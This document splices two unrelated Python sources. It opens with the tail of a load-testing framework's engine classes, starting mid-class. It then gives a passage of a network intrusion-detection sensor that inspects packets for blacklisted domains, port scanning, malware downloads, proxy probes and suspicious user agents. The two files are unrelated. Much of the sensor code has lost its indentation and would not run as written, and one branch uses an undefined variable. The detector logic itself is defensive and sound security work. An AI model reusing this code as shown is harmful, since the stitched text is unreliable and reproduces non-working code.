    EXEC = "execution"
    STEPS = "steps"

    # Unified load specification passed around between engine modules
    LOAD_FMT = namedtuple("LoadSpec", "concurrency throughput ramp_up hold iterations duration steps")

    def __init__(self):
        super(ScenarioExecutor, self).__init__()
        self.env = Environment(log=self.log)
        self.provisioning = None
        self.execution = BetterDict()  # FIXME: why have this field if we have `parameters` from base class?
        self.__scenario = None  # cached Scenario object, see get_scenario()
        self.label = None
        self.widget = None
        self.reader = None
        self.stdout = None
        self.stderr = None
        self.delay = None
        self.start_time = None
        self.preprocess_args = lambda x: None

    def _get_tool(self, tool, **kwargs):
        """Instantiate *tool* bound to this executor's environment/logger."""
        instance = tool(env=self.env, log=self.log, http_client=self.engine.get_http_client(), **kwargs)
        assert isinstance(instance, RequiredTool)
        return instance

    def has_results(self):
        """Whether the attached reader has buffered any results yet."""
        return bool(self.reader and self.reader.buffer)

    def get_script_path(self, required=False, scenario=None):
        """
        Resolve the scenario's script path (storing the resolved path back).

        :type required: bool
        :type scenario: Scenario
        """
        if scenario is None:
            scenario = self.get_scenario()

        if required:
            exc = TaurusConfigError("You must provide script for %s" % self)
            script = scenario.get(Scenario.SCRIPT, exc)
        else:
            script = scenario.get(Scenario.SCRIPT)

        if script:
            script = self.engine.find_file(script)
            scenario[Scenario.SCRIPT] = script  # normalize config in-place

        return script

    def get_scenario(self, name=None, cache_scenario=True):
        """
        Returns scenario dict, extract if scenario is inlined

        :return: DictOfDicts
        """
        if name is None and self.__scenario is not None:
            return self.__scenario

        scenarios = self.engine.config.get("scenarios", force_set=True)

        if name is None:  # get current scenario
            exc = TaurusConfigError("Scenario is not found in execution: %s" % self.execution)
            label = self.execution.get('scenario', exc)

            is_script = isinstance(label, string_types) and label not in scenarios and \
                os.path.exists(self.engine.find_file(label))
            if isinstance(label, list):
                msg = "Invalid content of scenario, list type instead of dict or string: %s"
                raise TaurusConfigError(msg % label)
            if isinstance(label, dict) or is_script:
                self.log.debug("Extract %s into scenarios" % label)
                if isinstance(label, string_types):
                    scenario = BetterDict.from_dict({Scenario.SCRIPT: label})
                else:
                    scenario = label

                path = self.get_script_path(scenario=Scenario(self.engine, scenario))
                if path:
                    label = os.path.basename(path)
                if not path or label in scenarios:
                    # anonymous inline scenario: derive a stable label from its content
                    hash_str = str(hashlib.md5(to_json(scenario).encode()).hexdigest())
                    label = 'autogenerated_' + hash_str[-10:]

                scenarios[label] = scenario
                self.execution['scenario'] = label

            self.label = label
        else:  # get scenario by name
            label = name

        exc = TaurusConfigError("Scenario '%s' not found in scenarios: %s" % (label, scenarios.keys()))
        scenario = scenarios.get(label, exc)
        scenario_obj = Scenario(self.engine, scenario)

        if name is None and cache_scenario:
            self.__scenario = scenario_obj

        return scenario_obj

    def get_raw_load(self):
        """Read load parameters from config without evaluation/normalization."""
        prov_type = self.engine.config.get(Provisioning.PROV)

        for param in (ScenarioExecutor.THRPT, ScenarioExecutor.CONCURR):
            ensure_is_dict(self.execution, param, prov_type)

        throughput = self.execution.get(ScenarioExecutor.THRPT).get(prov_type, None)
        concurrency = self.execution.get(ScenarioExecutor.CONCURR).get(prov_type, None)

        iterations = self.execution.get("iterations", None)
        steps = self.execution.get(ScenarioExecutor.STEPS, None)
        hold = self.execution.get(ScenarioExecutor.HOLD_FOR, None)
        ramp_up = self.execution.get(ScenarioExecutor.RAMP_UP, None)

        return self.LOAD_FMT(concurrency=concurrency, ramp_up=ramp_up, throughput=throughput, hold=hold,
                             iterations=iterations, duration=None, steps=steps)

    def get_load(self):
        """
        Helper method to read load specification

        :raises TaurusConfigError: when a load parameter is not numeric
        """
        def eval_int(value):
            try:
                return int(value)
            except (ValueError, TypeError):
                return value

        def eval_float(value):
            try:
                return float(value)  # BUGFIX: was int(), silently truncating fractional throughput
            except (ValueError, TypeError):
                return value

        raw_load = self.get_raw_load()

        iterations = eval_int(raw_load.iterations)
        ramp_up = raw_load.ramp_up

        throughput = eval_float(raw_load.throughput or 0)
        concurrency = eval_int(raw_load.concurrency or 0)
        steps = eval_int(raw_load.steps)
        hold = dehumanize_time(raw_load.hold or 0)

        if ramp_up is None:
            duration = hold
        else:
            ramp_up = dehumanize_time(raw_load.ramp_up)
            duration = hold + ramp_up

        if duration and not iterations:
            iterations = 0  # infinite

        msg = ''
        if not isinstance(concurrency, numeric_types + (type(None),)):
            msg += "Invalid concurrency value[%s]: %s " % (type(concurrency).__name__, concurrency)
        if not isinstance(throughput, numeric_types + (type(None),)):
            msg += "Invalid throughput value[%s]: %s " % (type(throughput).__name__, throughput)
        if not isinstance(steps, numeric_types + (type(None),)):
            # BUGFIX: message previously said "throughput" (copy-paste error)
            msg += "Invalid steps value[%s]: %s " % (type(steps).__name__, steps)
        if not isinstance(iterations, numeric_types + (type(None),)):
            # BUGFIX: message previously said "throughput" (copy-paste error)
            msg += "Invalid iterations value[%s]: %s " % (type(iterations).__name__, iterations)

        if msg:
            raise TaurusConfigError(msg)

        return self.LOAD_FMT(concurrency=concurrency, ramp_up=ramp_up, throughput=throughput, hold=hold,
                             iterations=iterations, duration=duration, steps=steps)

    def get_resource_files(self):
        """Collect resource files: executor-specific plus explicit 'files' list."""
        files_list = []
        if isinstance(self, FileLister):
            files_list.extend(self.resource_files())
        files_list.extend(self.execution.get("files", []))
        return files_list

    def __repr__(self):
        return "%s/%s" % (self.execution.get("executor", None), self.label if self.label else id(self))

    def execute(self, args, **kwargs):
        """Start the underlying tool subprocess with env/stdio defaults applied."""
        self.preprocess_args(args)

        # for compatibility with other executors
        kwargs["stdout"] = kwargs.get("stdout", self.stdout) or PIPE
        kwargs["stderr"] = kwargs.get("stderr", self.stderr) or PIPE

        kwargs["cwd"] = kwargs.get("cwd", None)
        kwargs["env"] = self.env

        self.start_time = time.time()

        try:
            process = self.engine.start_subprocess(args=args, **kwargs)
        except OSError as exc:
            raise ToolError("Failed to start %s: %s (%s)" % (self.__class__.__name__, exc, args))
        return process

    def post_process(self):
        """Close redirected stdio handles, then run base post-processing."""
        if self.stdout:
            self.stdout.close()
        if self.stderr:
            self.stderr.close()
        super(ScenarioExecutor, self).post_process()
class Reporter(EngineModule):
    """
    This type of modules is responsible for
    in-test and post-test results analysis
    """

    REP = "reporting"  # config section key for reporter modules

    def should_run(self):
        # Delegates to self._should_run() — defined in a base class outside this view
        return self._should_run()
class Service(EngineModule):
    """
    Base class for modules loaded from the "services" config section.

    NOTE(review): the previous docstring ("in-test and post-test results
    analysis") was a copy-paste from Reporter; these modules are keyed by
    SERV = "services" — confirm intended description against engine docs.
    """

    SERV = "services"  # config section key for service modules

    def should_run(self):
        # Delegates to self._should_run() — defined in a base class outside this view
        return self._should_run()
class Aggregator(EngineModule):
    """Engine module parameterized by a functional-mode flag."""

    def __init__(self, is_functional):
        super(Aggregator, self).__init__()
        # presumably True when aggregating functional-test results — TODO confirm
        self.is_functional = is_functional
class Scenario(UserDict, object):
    """
    Test scenario entity
    """

    SCRIPT = "script"
    COOKIES = "cookies"
    FIELD_RESP_CODE = "http-code"
    FIELD_HEADERS = "headers"
    FIELD_BODY = "body"
    FIELD_DATA_SOURCES = 'data-sources'

    def __init__(self, engine, scenario=None):
        super(Scenario, self).__init__()
        self.engine = engine
        # underlying config mapping used as UserDict storage
        self.data = scenario

    def get(self, key, default=defaultdict):
        """
        Look up *key* in the underlying data.

        NOTE(review): `defaultdict` (the class object itself) is used as a
        sentinel default — presumably handled specially by the underlying
        mapping's .get(); confirm before changing.

        :param key:
        :type default: object
        :return:
        """
        return self.data.get(key, default)

    def __getitem__(self, item):
        return self.data[item]

    def __setitem__(self, key, value):
        self.data[key] = value

    def __iter__(self):
        for item in self.data:
            yield item

    def __len__(self):
        return len(self.data)

    def __delitem__(self, key):
        # uses pop() instead of del, so the removed value is returned
        return self.data.pop(key)

    def get_headers(self):
        """
        Returns global headers

        :rtype: dict[str,str]
        """
        scenario = self
        headers = scenario.get("headers", {})
        if headers is None:  # the key may be explicitly set to null in config
            headers = {}
        return headers

    def get_requests(self, parser=RequestParser, require_url=True):
        """
        Generator object to read requests

        :type require_url: bool
        :type parser: class
        :rtype: list[bzt.requests_model.Request]
        """
        requests_parser = parser(self, self.engine)
        return requests_parser.extract_requests(require_url=require_url,)

    def get_data_sources(self):
        """Validate 'data-sources' is a list, normalize entries to dicts keyed by "path", return it."""
        data_sources = self.get(self.FIELD_DATA_SOURCES, [])
        if not isinstance(data_sources, list):
            raise TaurusConfigError("data-sources '%s' is not a list" % data_sources)
        for index, _ in enumerate(data_sources):
            ensure_is_dict(data_sources, index, "path")
        return self.get(self.FIELD_DATA_SOURCES, [])
class HavingInstallableTools(object):
    """Interface for modules that can install the external tools they require."""

    @abstractmethod
    def install_required_tools(self):
        pass
class Singletone(object):
    # Empty marker class (name keeps the original spelling; callers depend on it);
    # presumably signals that only one instance of the module should exist — TODO confirm
    pass
class SelfDiagnosable(object):
    """Interface for modules that can report extra diagnostics on error."""

    @abstractmethod
    def get_error_diagnostics(self):
        """
        :rtype: list[str]
        """
        pass
# ==== sensor.py ====
#!/usr/bin/env python
"""
Copyright (c) 2014-2020 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function # Requires: Python >= 2.6
import sys
sys.dont_write_bytecode = True
import cProfile
import inspect
import math
import mmap
import optparse
import os
import platform
import re
import socket
import subprocess
import struct
import threading
import time
import traceback
import warnings
from core.addr import inet_ntoa6
from core.addr import addr_port
from core.attribdict import AttribDict
from core.common import check_connection
from core.common import check_sudo
from core.common import check_whitelisted
from core.common import get_ex_message
from core.common import get_text
from core.common import is_local
from core.common import load_trails
from core.compat import xrange
from core.datatype import LRUDict
from core.enums import BLOCK_MARKER
from core.enums import CACHE_TYPE
from core.enums import PROTO
from core.enums import TRAIL
from core.log import create_log_directory
from core.log import flush_condensed_events
from core.log import get_error_log_handle
from core.log import log_error
from core.log import log_event
from core.parallel import worker
from core.parallel import write_block
from core.settings import check_memory
from core.settings import config
from core.settings import CAPTURE_TIMEOUT
from core.settings import CHECK_CONNECTION_MAX_RETRIES
from core.settings import CONFIG_FILE
from core.settings import CONSONANTS
from core.settings import DAILY_SECS
from core.settings import DLT_OFFSETS
from core.settings import DNS_EXHAUSTION_THRESHOLD
from core.settings import GENERIC_SINKHOLE_REGEX
from core.settings import HTTP_TIME_FORMAT
from core.settings import IGNORE_DNS_QUERY_SUFFIXES
from core.settings import IPPROTO_LUT
from core.settings import IS_WIN
from core.settings import LOCALHOST_IP
from core.settings import LOCAL_SUBDOMAIN_LOOKUPS
from core.settings import MMAP_ZFILL_CHUNK_LENGTH
from core.settings import MAX_RESULT_CACHE_ENTRIES
from core.settings import NAME
from core.settings import NO_SUCH_NAME_COUNTERS
from core.settings import NO_SUCH_NAME_PER_HOUR_THRESHOLD
from core.settings import INFECTION_SCANNING_THRESHOLD
from core.settings import PORT_SCANNING_THRESHOLD
from core.settings import POTENTIAL_INFECTION_PORTS
from core.settings import read_config
from core.settings import REGULAR_SENSOR_SLEEP_TIME
from core.settings import SNAP_LEN
from core.settings import SUSPICIOUS_CONTENT_TYPES
from core.settings import SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS
from core.settings import SUSPICIOUS_DIRECT_IP_URL_REGEX
from core.settings import SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD
from core.settings import SUSPICIOUS_HTTP_PATH_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION
from core.settings import SUSPICIOUS_HTTP_REQUEST_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS
from core.settings import SUSPICIOUS_PROXY_PROBE_PRE_CONDITION
from core.settings import SUSPICIOUS_UA_REGEX
from core.settings import VALID_DNS_NAME_REGEX
from core.settings import trails
from core.settings import VERSION
from core.settings import WEB_SHELLS
from core.settings import WHITELIST
from core.settings import WHITELIST_DIRECT_DOWNLOAD_KEYWORDS
from core.settings import WHITELIST_LONG_DOMAIN_NAME_KEYWORDS
from core.settings import WHITELIST_HTTP_REQUEST_PATHS
from core.settings import WHITELIST_UA_REGEX
from core.update import update_ipcat
from core.update import update_trails
from thirdparty import six
from thirdparty.six.moves import urllib as _urllib
warnings.filterwarnings(action="ignore", category=DeprecationWarning)  # NOTE: https://github.com/helpsystems/pcapy/pull/67/files

# Module-level mutable state shared by the capture/processing code below
_buffer = None
_caps = []
_connect_sec = 0  # last second observed by the heuristic connect tracker
_connect_src_dst = {}  # "src~dst" -> set of dst ports, or "src~port" -> set of dst IPs
_connect_src_details = {}  # same keys -> set of (sec, usec, ...) tuples
_count = 0
_locks = AttribDict()
_multiprocessing = None
_n = None
_result_cache = LRUDict(MAX_RESULT_CACHE_ENTRIES)  # bounded memoization cache keyed by (CACHE_TYPE, value)
_local_cache = {}
_last_syn = None  # used to skip duplicate SYN bursts
_last_logged_syn = None
_last_udp = None  # used to skip duplicate UDP bursts
_last_logged_udp = None
_last_dns_exhaustion = None
_done_count = 0
_done_lock = threading.Lock()
_subdomains = {}  # domain -> set of seen subdomain prefixes (DNS exhaustion heuristic)
_subdomains_sec = None
_dns_exhausted_domains = set()
# pcapy is a hard requirement for packet capture; fail fast with install hints
try:
    import pcapy
except ImportError:
    if IS_WIN:
        exit("[!] please install 'WinPcap' (e.g. 'http://www.winpcap.org/install/') and Pcapy (e.g. 'https://breakingcode.wordpress.com/?s=pcapy')")
    else:
        # pip major version chosen to match the running interpreter
        msg = "[!] please install 'Pcapy' (e.g. 'sudo pip%s install pcapy')" % ('3' if six.PY3 else '2')
        exit(msg)
def _check_domain_member(query, domains):
parts = query.lower().split('.')
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in domains:
return True
return False
def _check_domain_whitelisted(query):
    """Cached check of whether *query*'s leading domain token is whitelisted."""
    cache_key = (CACHE_TYPE.DOMAIN_WHITELISTED, query)
    cached = _result_cache.get(cache_key)
    if cached is None:
        # strip anything after the first non-domain character before matching
        domain = re.split(r"(?i)[^A-Z0-9._-]", query or "")[0]
        cached = _check_domain_member(domain, WHITELIST)
        _result_cache[cache_key] = cached
    return cached
def _check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, proto, packet=None):
    """
    Check a domain name (from DNS query or HTTP Host) against blacklist
    trails and heuristics, logging an event for each match.
    """
    if query:
        query = query.lower()
        if ':' in query:
            query = query.split(':', 1)[0]

    if query.replace('.', "").isdigit():  # IP address
        return

    if _result_cache.get((CACHE_TYPE.DOMAIN, query)) == False:  # negative-cached earlier
        return

    result = False
    if re.search(VALID_DNS_NAME_REGEX, query) is not None and not _check_domain_whitelisted(query):
        parts = query.split('.')

        if ".onion." in query:
            # e.g. "foo.onion.to" -> trail "foo.onion(.to)", lookup key "foo.onion"
            trail = re.sub(r"(\.onion)(\..*)", r"\1(\2)", query)
            _ = trail.split('(')[0]
            if _ in trails:
                result = True
                log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[_][0], trails[_][1]), packet)
        elif query.endswith(".ip-adress.com"):  # Reference: https://www.virustotal.com/gui/domain/ip-adress.com/relations
            _ = '.'.join(parts[:-2])
            trail = "%s(.ip-adress.com)" % _
            if _ in trails:
                result = True
                log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[_][0], trails[_][1]), packet)

        if not result:
            # walk suffixes of the query, longest first, looking for a blacklisted (parent) domain
            for i in xrange(0, len(parts)):
                domain = '.'.join(parts[i:])
                if domain in trails:
                    if domain == query:
                        trail = domain
                    else:
                        _ = ".%s" % domain
                        trail = "(%s)%s" % (query[:-len(_)], _)

                    if not (re.search(r"(?i)\A([rd]?ns|nf|mx|nic)\d*\.", query) and any(_ in trails.get(domain, " ")[0] for _ in ("suspicious", "sinkhole"))):  # e.g. ns2.nobel.su
                        if not ((query == trail or parts[0] == "www") and any(_ in trails.get(domain, " ")[0] for _ in ("dynamic", "free web"))):  # e.g. noip.com
                            result = True
                            log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[domain][0], trails[domain][1]), packet)
                            break

        if not result and config.USE_HEURISTICS:
            # heuristic: unusually long leftmost label without hyphens
            if len(parts[0]) > SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD and '-' not in parts[0]:
                trail = None

                if len(parts) > 2:
                    trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
                elif len(parts) == 2:
                    trail = "(%s).%s" % (parts[0], parts[1])
                else:
                    trail = query

                if trail and not any(_ in trail for _ in WHITELIST_LONG_DOMAIN_NAME_KEYWORDS):
                    result = True
                    log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, "long domain (suspicious)", "(heuristic)"), packet)

        if not result and trails._regex:
            match = re.search(trails._regex, query)
            if match:
                # recover which named group matched and the original trail entry it came from
                group, trail = [_ for _ in match.groupdict().items() if _[1] is not None][0]
                candidate = trails._regex.split("(?P<")[int(group[1:]) + 1]
                candidate = candidate.split('>', 1)[-1].rstrip('|')[:-1]
                if candidate in trails:
                    result = True
                    trail = match.group(0)
                    prefix, suffix = query[:match.start()], query[match.end():]
                    if prefix:
                        trail = "(%s)%s" % (prefix, trail)
                    if suffix:
                        trail = "%s(%s)" % (trail, suffix)
                    trail = trail.replace(".)", ").")
                    log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[candidate][0], trails[candidate][1]), packet)

    if result == False:
        # negative-cache so repeated queries for the same benign domain are cheap
        _result_cache[(CACHE_TYPE.DOMAIN, query)] = False
def _get_local_prefix():
    """Infer the most common local source-IP prefix from tracked connections."""
    sources = set(key.split('~')[0] for key in _connect_src_dst.keys())
    # drop the last two octets so e.g. "192.168.1.2" becomes "192.168."
    prefixes = [re.sub(r"\d+\.\d+\Z", "", source) for source in sources]
    ranked = sorted(((prefixes.count(prefix), prefix) for prefix in set(prefixes)), reverse=True)
    result = ranked[0][1] if ranked else ""
    if result:
        _result_cache[(CACHE_TYPE.LOCAL_PREFIX, "")] = result
    else:
        # fall back to the last known prefix when no connections are tracked
        result = _result_cache.get((CACHE_TYPE.LOCAL_PREFIX, ""))
    return result or '_'
def _process_packet(packet, sec, usec, ip_offset):
"""
Processes single (raw) IP layer data
"""
global _connect_sec
global _last_syn
global _last_logged_syn
global _last_udp
global _last_logged_udp
global _last_dns_exhaustion
global _subdomains_sec
try:
if config.USE_HEURISTICS:
if _locks.connect_sec:
_locks.connect_sec.acquire()
connect_sec = _connect_sec
_connect_sec = sec
if _locks.connect_sec:
_locks.connect_sec.release()
if sec > connect_sec:
for key in _connect_src_dst:
_src_ip, _dst = key.split('~')
if not _dst.isdigit() and len(_connect_src_dst[key]) > PORT_SCANNING_THRESHOLD:
if not check_whitelisted(_src_ip):
_dst_ip = _dst
for _ in _connect_src_details[key]:
log_event((sec, usec, _src_ip, _[2], _dst_ip, _[3], PROTO.TCP, TRAIL.IP, _src_ip, "potential port scanning", "(heuristic)"), packet)
elif len(_connect_src_dst[key]) > INFECTION_SCANNING_THRESHOLD:
_dst_port = _dst
_dst_ip = [_[-1] for _ in _connect_src_details[key]]
_src_port = [_[-2] for _ in _connect_src_details[key]]
if len(_dst_ip) == len(set(_dst_ip)):
if _src_ip.startswith(_get_local_prefix()):
log_event((sec, usec, _src_ip, _src_port[0], _dst_ip[0], _dst_port, PROTO.TCP, TRAIL.PORT, _dst_port, "potential infection", "(heuristic)"), packet)
_connect_src_dst.clear()
_connect_src_details.clear()
ip_data = packet[ip_offset:]
ip_version = ord(ip_data[0:1]) >> 4
localhost_ip = LOCALHOST_IP[ip_version]
if ip_version == 0x04: # IPv4
ip_header = struct.unpack("!BBHHHBBH4s4s", ip_data[:20])
fragment_offset = ip_header[4] & 0x1fff
if fragment_offset != 0:
return
iph_length = (ip_header[0] & 0xf) << 2
protocol = ip_header[6]
src_ip = socket.inet_ntoa(ip_header[8])
dst_ip = socket.inet_ntoa(ip_header[9])
elif ip_version == 0x06: # IPv6
# Reference: http://chrisgrundemann.com/index.php/2012/introducing-ipv6-understanding-ipv6-addresses/
ip_header = struct.unpack("!BBHHBB16s16s", ip_data[:40])
iph_length = 40
protocol = ip_header[4]
src_ip = inet_ntoa6(ip_header[6])
dst_ip = inet_ntoa6(ip_header[7])
else:
return
if protocol == socket.IPPROTO_TCP: # TCP
src_port, dst_port, _, _, doff_reserved, flags = struct.unpack("!HHLLBB", ip_data[iph_length:iph_length+14])
if flags != 2 and config.plugin_functions:
if dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet, skip_write=True)
elif src_ip in trails and dst_ip != localhost_ip:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet, skip_write=True)
if flags == 2: # SYN set (only)
_ = _last_syn
_last_syn = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_syn: # skip bursts
return
if dst_ip in trails or addr_port(dst_ip, dst_port) in trails:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = addr_port(dst_ip, dst_port)
if trail not in trails:
trail = dst_ip
if not any(_ in trails[trail][0] for _ in ("attacker",)) and not ("parking site" in trails[trail][0] and dst_port not in (80, 443)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
elif (src_ip in trails or addr_port(src_ip, src_port) in trails) and dst_ip != localhost_ip:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = addr_port(src_ip, src_port)
if trail not in trails:
trail = src_ip
if not any(_ in trails[trail][0] for _ in ("malware",)):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
if config.USE_HEURISTICS:
if dst_ip != localhost_ip:
key = "%s~%s" % (src_ip, dst_ip)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_port)
_connect_src_details[key].add((sec, usec, src_port, dst_port))
if dst_port in POTENTIAL_INFECTION_PORTS:
key = "%s~%s" % (src_ip, dst_port)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_ip)
_connect_src_details[key].add((sec, usec, src_port, dst_ip))
else:
tcph_length = doff_reserved >> 4
h_size = iph_length + (tcph_length << 2)
tcp_data = get_text(ip_data[h_size:])
if tcp_data.startswith("HTTP/"):
match = re.search(GENERIC_SINKHOLE_REGEX, tcp_data[:2000])
if match:
trail = match.group(0)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "sinkhole response (malware)", "(heuristic)"), packet)
else:
index = tcp_data.find("<title>")
if index >= 0:
title = tcp_data[index + len("<title>"):tcp_data.find("</title>", index)]
if all(_ in title.lower() for _ in ("this domain", "has been seized")):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, title, "seized domain (suspicious)", "(heuristic)"), packet)
content_type = None
first_index = tcp_data.find("\r\nContent-Type:")
if first_index >= 0:
first_index = first_index + len("\r\nContent-Type:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
content_type = tcp_data[first_index:last_index].strip().lower()
if content_type and content_type in SUSPICIOUS_CONTENT_TYPES:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, content_type, "content type (suspicious)", "(heuristic)"), packet)
method, path = None, None
if " HTTP/" in tcp_data:
index = tcp_data.find("\r\n")
if index >= 0:
line = tcp_data[:index]
if line.count(' ') == 2 and " HTTP/" in line:
method, path, _ = line.split(' ')
if method and path:
post_data = None
host = dst_ip
first_index = tcp_data.find("\r\nHost:")
path = path.lower()
if first_index >= 0:
first_index = first_index + len("\r\nHost:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
host = tcp_data[first_index:last_index]
host = host.strip().lower()
if host.endswith(":80"):
host = host[:-3]
if host and host[0].isalpha() and dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, "%s (%s)" % (dst_ip, host.split(':')[0]), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif re.search(r"\A\d+\.[0-9.]+\Z", host or "") and re.search(SUSPICIOUS_DIRECT_IP_URL_REGEX, "%s%s" % (host, path)):
if not _dst_ip.startswith(_get_local_prefix()):
trail = "(%s)%s" % (host, path)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "potential iot-malware download (suspicious)", "(heuristic)"), packet)
return
elif config.CHECK_HOST_DOMAINS:
_check_domain(host, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif config.USE_HEURISTICS and config.CHECK_MISSING_HOST:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, "%s%s" % (host, path), "missing host header (suspicious)", "(heuristic)"), packet)
index = tcp_data.find("\r\n\r\n")
if index >= 0:
post_data = tcp_data[index + 4:]
if config.USE_HEURISTICS and dst_port == 80 and path.startswith("http://") and any(_ in path for _ in SUSPICIOUS_PROXY_PROBE_PRE_CONDITION) and not _check_domain_whitelisted(path.split('/')[2]):
trail = re.sub(r"(http://[^/]+/)(.+)", r"\g<1>(\g<2>)", path)
trail = re.sub(r"(http://)([^/(]+)", lambda match: "%s%s" % (match.group(1), match.group(2).split(':')[0].rstrip('.')), trail)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "potential proxy probe (suspicious)", "(heuristic)"), packet)
return
elif "://" in path:
unquoted_path = _urllib.parse.unquote(path)
key = "code execution"
if key not in _local_cache:
_local_cache[key] = next(_[1] for _ in SUSPICIOUS_HTTP_REQUEST_REGEXES if "code execution" in _[0])
if re.search(_local_cache[key], unquoted_path, re.I) is None: # NOTE: to prevent malware domain FPs in case of outside scanners
url = path.split("://", 1)[1]
if '/' not in url:
url = "%s/" % url
host, path = url.split('/', 1)
if host.endswith(":80"):
host = host[:-3]
path = "/%s" % path
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif method == "CONNECT":
if '/' in path:
host, path = path.split('/', 1)
path = "/%s" % path
else:
host, path = path, '/'
if host.endswith(":80"):
host = host[:-3]
url = "%s%s" % (host, path)
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
else:
url = "%s%s" % (host, path)
if config.USE_HEURISTICS:
user_agent, result = None, None
first_index = tcp_data.find("\r\nUser-Agent:")
if first_index >= 0:
first_index = first_index + len("\r\nUser-Agent:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
user_agent = tcp_data[first_index:last_index]
user_agent = _urllib.parse.unquote(user_agent).strip()
if user_agent:
result = _result_cache.get((CACHE_TYPE.USER_AGENT, user_agent))
if result is None:
if re.search(WHITELIST_UA_REGEX, user_agent, re.I) is None:
match = re.search(SUSPICIOUS_UA_REGEX, user_agent)
if match:
def _(value):
return value.rstrip('\\').replace('(', "\\(").replace(')', "\\)")
parts = user_agent.split(match.group(0), 1)
if len(parts) > 1 and parts[0] and parts[-1]:
result = _result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = "%s (%s)" % (_(match.group(0)), _(user_agent))
else:
result = _result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = _(match.group(0)).join(("(%s)" if part else "%s") % _(part) for part in parts)
if not result:
_result_cache[(CACHE_TYPE.USER_AGENT, user_agent)] = False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.UA, result, "user agent (suspicious)", "(heuristic)"), packet)
if not _check_domain_whitelisted(host):
unquoted_path = _urllib.parse.unquote(path)
unquoted_post_data = _urllib.parse.unquote(post_data or "")
checks = [path.rstrip('/')]
if '?' in path:
checks.append(path.split('?')[0].rstrip('/'))
if '=' in path:
checks.append(path[:path.index('=') + 1])
_ = re.sub(r"(\w+=)[^&=]+", r"\g<1>", path)
if _ not in checks:
checks.append(_)
if _.count('/') > 1:
checks.append("/%s" % _.split('/')[-1])
elif post_data:
checks.append("%s?%s" % (path, unquoted_post_data.lower()))
#_ = os.path.splitext(checks[-1]) # causing FPs in cases like elf_mirai - /juno if legit /juno.php is accessed
#if _[1]:
#checks.append(_[0])
if checks[-1].count('/') > 1:
checks.append(checks[-1][:checks[-1].rfind('/')])
checks.append(checks[0][checks[0].rfind('/'):].split('?')[0])
for check in filter(None, checks):
for _ in ("", host):
check = "%s%s" % (_, check)
if check in trails:
if '?' not in path and '?' in check and post_data:
trail = "%s(%s \\(%s %s\\))" % (host, path, method, post_data.strip())
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, trails[check][0], trails[check][1]))
else:
parts = url.split(check)
other = ("(%s)" % _ if _ else _ for _ in parts)
trail = check.join(other)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.URL, trail, trails[check][0], trails[check][1]))
return
